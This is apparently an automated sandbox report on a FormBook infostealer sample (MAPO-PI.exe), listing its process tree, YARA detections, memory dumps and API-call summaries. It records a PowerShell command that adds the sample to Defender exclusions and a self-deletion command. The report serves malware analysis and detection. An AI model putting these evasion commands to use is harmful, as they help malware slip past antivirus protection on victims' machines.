                                GetMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xEA

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                Analysis Process: MAPO-PI.exe PID: 3868 Parent PID: 5148

                                General

                                Start time:07:40:03
                                Start date:28/10/2021
                                Path:C:\Users\user\Desktop\MAPO-PI.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\Desktop\MAPO-PI.exe'
                                Imagebase:0x70000
                                File size:532992 bytes
                                MD5 hash:C619BBBE3C374C8FD3E9F2C26D087496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                Chronological Activities

                                Analysis Process: powershell.exe PID: 2592 Parent PID: 3868

                                General

                                Start time:07:40:05
                                Start date:28/10/2021
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe'
                                Imagebase:0x80000
                                File size:430592 bytes
                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Reputation:high

                                Chronological Activities

                                Analysis Process: conhost.exe PID: 5196 Parent PID: 2592

                                General

                                Start time:07:40:06
                                Start date:28/10/2021
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7ecfc0000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Analysis Process: MAPO-PI.exe PID: 5128 Parent PID: 3868

                                General

                                Start time:07:40:06
                                Start date:28/10/2021
                                Path:C:\Users\user\Desktop\MAPO-PI.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\MAPO-PI.exe
                                Imagebase:0xeb0000
                                File size:532992 bytes
                                MD5 hash:C619BBBE3C374C8FD3E9F2C26D087496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low

                                Chronological Activities

                                Analysis Process: explorer.exe PID: 3472 Parent PID: 5128

                                General

                                Start time:07:40:09
                                Start date:28/10/2021
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0x7ff693d90000
                                File size:3933184 bytes
                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:high

                                Chronological Activities

                                Analysis Process: cmmon32.exe PID: 6928 Parent PID: 3472

                                General

                                Start time:07:40:31
                                Start date:28/10/2021
                                Path:C:\Windows\SysWOW64\cmmon32.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                Imagebase:0x8b0000
                                File size:36864 bytes
                                MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:moderate

                                Chronological Activities

                                Analysis Process: cmd.exe PID: 980 Parent PID: 6928

                                General

                                Start time:07:40:35
                                Start date:28/10/2021
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:/c del 'C:\Users\user\Desktop\MAPO-PI.exe'
                                Imagebase:0x150000
                                File size:232960 bytes
                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Analysis Process: conhost.exe PID: 6084 Parent PID: 980

                                General

                                Start time:07:40:36
                                Start date:28/10/2021
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7ecfc0000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Disassembly

                                Code Analysis

                                Reset < >

                                  Analysis Process: MAPO-PI.exe PID: 3868 Parent PID: 5148 MAPO-PI.exeCOMMON

                                  Executed Functions

                                  Function 0094E6A0, Relevance: .3, Instructions: 315COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237991355.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6b517ca601d9a8ad6ec5c25548261ddf7ac7ae8ee496976a63fca553c56307a4
                                  • Instruction ID: 1be0decd201cffcf7f209c9539df75fa442395dc4782fca84cbe3b62332df74b
                                  • Opcode Fuzzy Hash: 6b517ca601d9a8ad6ec5c25548261ddf7ac7ae8ee496976a63fca553c56307a4
                                  • Instruction Fuzzy Hash: A912B3F1429F46CBD310CFA5ED982893BA1B745328F92430DD2A56AAF1D7F4114AEF84
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0094E690, Relevance: .2, Instructions: 221COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237991355.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 597a8388080f96f74ec849085bf41d2afed580f845b1afffe6ea4e1a9bc18400
                                  • Instruction ID: abfbf30fd8b696ec76788a9b2fbd71da8d7057827d1743587c03a968a9868581
                                  • Opcode Fuzzy Hash: 597a8388080f96f74ec849085bf41d2afed580f845b1afffe6ea4e1a9bc18400
                                  • Instruction Fuzzy Hash: 47C117B1829B46CBD710DFA5EC981893BB1BB85328F92431DD2616B6F0D7F4114AEF84
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0094BBA0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 0094BC10
                                  • GetCurrentThread.KERNEL32 ref: 0094BC4D
                                  • GetCurrentProcess.KERNEL32 ref: 0094BC8A
                                  • GetCurrentThreadId.KERNEL32 ref: 0094BCE3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237991355.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID: h}o
                                  • API String ID: 2063062207-4263065848
                                  • Opcode ID: de65dcd533d3f612a1c451f80230b508161bf3a71c8c9a4fb34f1c551027d5ee
                                  • Instruction ID: 03baf9e6eb5d4d7b81c57dfb65e48fe582126299e0bb44881335cb53adce9176
                                  • Opcode Fuzzy Hash: de65dcd533d3f612a1c451f80230b508161bf3a71c8c9a4fb34f1c551027d5ee
                                  • Instruction Fuzzy Hash: DC5179B49007498FDB10CFA9C988BDEBBF1BF49314F24845AD459B32A0CB749844CF65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0094BBB0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 0094BC10
                                  • GetCurrentThread.KERNEL32 ref: 0094BC4D
                                  • GetCurrentProcess.KERNEL32 ref: 0094BC8A
                                  • GetCurrentThreadId.KERNEL32 ref: 0094BCE3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237991355.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID: h}o
                                  • API String ID: 2063062207-4263065848
                                  • Opcode ID: 319adb603cf76a0ee97b65ed84360d1810b46f16007dfe2b3b02d366ca17264d
                                  • Instruction ID: 19e91931ff52dbe0d57d6e75981304ae801ca5659c943f76b147d38b98f41ebb
                                  • Opcode Fuzzy Hash: 319adb603cf76a0ee97b65ed84360d1810b46f16007dfe2b3b02d366ca17264d
                                  • Instruction Fuzzy Hash: 845156B09007498FDB14CFA9D988BDEBBF5BF49314F248469E449B3250DB74A884CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 009498B0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 194COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00949AF6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237991355.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID: |Ok$|Ok
                                  • API String ID: 4139908857-2037569923
                                  • Opcode ID: 86ee55d20db908612c55b1477f23f829a52c6cda84b54f149f0650b50845347a
                                  • Instruction ID: fabd0f681fbb46bde5af786e63f1000bbb05c6d0c314c7ef5b8f794c936e641f
                                  • Opcode Fuzzy Hash: 86ee55d20db908612c55b1477f23f829a52c6cda84b54f149f0650b50845347a
                                  • Instruction Fuzzy Hash: 33712270A00B058FDB64DF6AD041B9BBBF5BF89314F008A2DE48AD7A50DB35E8458F91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00943EC8, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 009454A9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237991355.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: daa0508dfbbd223125f36ed4ac7e75c0529e221e84d6fadba48c29215537f89d
                                  • Instruction ID: 2e333e7fde0cb13a1b689a569d66c3ecec8ae3e208827ad44add6a5df9e30c05
                                  • Opcode Fuzzy Hash: daa0508dfbbd223125f36ed4ac7e75c0529e221e84d6fadba48c29215537f89d
                                  • Instruction Fuzzy Hash: B241F271C00719CBDB24CFA9C888BDEBBB5FF89308F248469D408AB251DB716946CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 009453ED, Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 009454A9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237991355.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 888b727a2f0e59606bdc9b4921c6bf235f60fa653ddaea35b7391fe2e1777d0a
                                  • Instruction ID: 2c1c56541882b831536a1ba9c476cffc88d1072f1ad5f32f846a09f167d231e5
                                  • Opcode Fuzzy Hash: 888b727a2f0e59606bdc9b4921c6bf235f60fa653ddaea35b7391fe2e1777d0a
                                  • Instruction Fuzzy Hash: 1E41F571C04719CFDB24CFA9C884BDDBBB5BF89308F24846AD408AB251D7756946CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0094BDD2, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0094BE5F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237991355.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 979f771e4f6b63fadc5ff7e33ddd970e07873412d79a3a2ad9fde9fa4f5ec2f0
                                  • Instruction ID: e5f99caeac942aa8274c4b7406bcd21f371a76c9f381d64a823a9db47fa4fb74
                                  • Opcode Fuzzy Hash: 979f771e4f6b63fadc5ff7e33ddd970e07873412d79a3a2ad9fde9fa4f5ec2f0
                                  • Instruction Fuzzy Hash: 1E21F2B5900249AFCB10CFA9D984AEEBFF4EB48324F14841AE955A3350D374A954CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0094BDD8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0094BE5F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237991355.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 2a6f5a850e090143212e22653a8b1777baf1f93f7a7e92d0cff88cef1da45d2d
                                  • Instruction ID: a5ff61a14d43457c4ee5429e12c7adfbdf5d3dd1786623c9d8d0388b084e0bca
                                  • Opcode Fuzzy Hash: 2a6f5a850e090143212e22653a8b1777baf1f93f7a7e92d0cff88cef1da45d2d
                                  • Instruction Fuzzy Hash: 6D21E2B5900209AFDB10CFA9D984ADEBBF8FB48324F14841AE914A3350D374A954CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00949588, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00949B71,00000800,00000000,00000000), ref: 00949D82
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237991355.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: bd9af20cd79cf209260c16e10d73af98a86da64308feb36ddc5bc8c16ca4e12b
                                  • Instruction ID: dd677d018cafebcf9d901acb91f1740880f8b9e0bd987afc8e62a628ccbc7a5c
                                  • Opcode Fuzzy Hash: bd9af20cd79cf209260c16e10d73af98a86da64308feb36ddc5bc8c16ca4e12b
                                  • Instruction Fuzzy Hash: 0F11E4B6D003499FCB10DF9AD444ADEFBF8EF88324F14842AE519A7640C375A945CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00949D11, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00949B71,00000800,00000000,00000000), ref: 00949D82
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237991355.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: c32a36fc9a02ced100426b4b66dc00c498557e400fe55c5d978a963e97b741a8
                                  • Instruction ID: 0d4648a7710033e0167f761e00615cb4bcb40b0e895c6ab4dfcb42ac6bff0afd
                                  • Opcode Fuzzy Hash: c32a36fc9a02ced100426b4b66dc00c498557e400fe55c5d978a963e97b741a8
                                  • Instruction Fuzzy Hash: BD11F9B5D003498FCB10CF99D884ADEFBF4AF88314F14852EE455A7641C375A549CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00949A90, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00949AF6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237991355.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: afa8c81f22732d64a39571802155c7a9705e1a6cce1cb1879f2a4791b4ba759f
                                  • Instruction ID: a0ca450fd56df9728dca01f850ec4b6869e25d4dc9c07d3341b6287025ebad2c
                                  • Opcode Fuzzy Hash: afa8c81f22732d64a39571802155c7a9705e1a6cce1cb1879f2a4791b4ba759f
                                  • Instruction Fuzzy Hash: 6811DFB5D006498FCB10CF9AD444ADEFBF8EF89324F14852AD869B7600D375A545CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 006BD01C, Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237688154.00000000006BD000.00000040.00000001.sdmp, Offset: 006BD000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ee159a45c980087e7a7f242d64df73776da2e549fe2fcc85f366d2ee03edc8ee
                                  • Instruction ID: 797d2768981b90f25da3736cb42559ce9b46430a04dfb22778bf73524232fa90
                                  • Opcode Fuzzy Hash: ee159a45c980087e7a7f242d64df73776da2e549fe2fcc85f366d2ee03edc8ee
                                  • Instruction Fuzzy Hash: 352107B5504240DFCB14EF54D9C4BA6BBA6FB88324F24C9A9D8094F386D336D887CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 006BD006, Relevance: .1, Instructions: 61COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237688154.00000000006BD000.00000040.00000001.sdmp, Offset: 006BD000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f793949b337ae4ff9dcc3a442773f01242d265d866949f9d8e095959a8fc4bb1
                                  • Instruction ID: 735141eb918e2a44baf631902940f6d1daafae49bea341cb07a81dd353019a26
                                  • Opcode Fuzzy Hash: f793949b337ae4ff9dcc3a442773f01242d265d866949f9d8e095959a8fc4bb1
                                  • Instruction Fuzzy Hash: 99218E755093C08FCB02DF24D994B55BF72EB46314F28C5DAD8498F6A7C33A984ACB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 00075376, Relevance: .3, Instructions: 265COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237479271.0000000000072000.00000002.00020000.sdmp, Offset: 00070000, based on PE: true
                                  • Associated: 00000000.00000002.237473886.0000000000070000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.237489008.000000000007F000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.237496370.000000000008A000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2b1929371aab53472a3dbf485ba2cd3b7e192a744007e71e418c0859f1648afc
                                  • Instruction ID: 677f15a3550a38c36cd9dfead422c1af30a2e8f2f325db0862be591a8e2b5be6
                                  • Opcode Fuzzy Hash: 2b1929371aab53472a3dbf485ba2cd3b7e192a744007e71e418c0859f1648afc
                                  • Instruction Fuzzy Hash: 75B1C86244E3D1AFC7534B744CA56827FB0AE53214B5F85EBC4C2CF5A3E219185AC7A3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0094CC5C, Relevance: .3, Instructions: 265COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237991355.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d486f61b35694fb453d29a92a65022c8c08ed11700784013d9ac024f8038054f
                                  • Instruction ID: 588fd812e725e5daf47822622646fafd394152409744fe0546a6735ccd751cc3
                                  • Opcode Fuzzy Hash: d486f61b35694fb453d29a92a65022c8c08ed11700784013d9ac024f8038054f
                                  • Instruction Fuzzy Hash: 22A17C36E112098FCF15DFA5C8449DEBBF6FF89300B15856AE805BB261EB71A945CF80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Analysis Process: MAPO-PI.exe PID: 5128 Parent PID: 3868 MAPO-PI.exeCOMMON

                                  Executed Functions

                                  Function 00419DFB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: 2MA$2MA
                                  • API String ID: 2738559852-947276439
                                  • Opcode ID: 171758033c0c55603c32c5ab92d4b9521515d23d63aa1bfbeb9a1c096735890f
                                  • Instruction ID: 89f0697d20aa7e5aa07c062835c0dd6e678ddd8087c8e97a0c764592e2c166f1
                                  • Opcode Fuzzy Hash: 171758033c0c55603c32c5ab92d4b9521515d23d63aa1bfbeb9a1c096735890f
                                  • Instruction Fuzzy Hash: A7117CB2200104BFDB14DF99DC91EEB77ADEF8C724F05864AFA1C97241C630E8518BA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00419E00, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: 2MA$2MA
                                  • API String ID: 2738559852-947276439
                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction ID: e2eeafcdabc96c90d19f56ab9cfe9238ee24689222a5818d11d4b5cf4f7c0d6d
                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction Fuzzy Hash: 90F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158649BE1D97241D630E851CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00419DA2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: wKA
                                  • API String ID: 823142352-3165208591
                                  • Opcode ID: 1baabf4f3e5987b0d1137696199ab20d065deca4cbe244786198252afe9aba08
                                  • Instruction ID: 3259957352d79b0641e44d88ff33b2a0f21cf3a8ea7235da9a9aacad622f17b2
                                  • Opcode Fuzzy Hash: 1baabf4f3e5987b0d1137696199ab20d065deca4cbe244786198252afe9aba08
                                  • Instruction Fuzzy Hash: 5F1135B6214108AFCB08CF98EC91DEB77ADEF8C754B14864DFA5D97241C630E952CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00419D4A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45filenativeCOMMON
                                  Download Yara Rule
                                  APIs
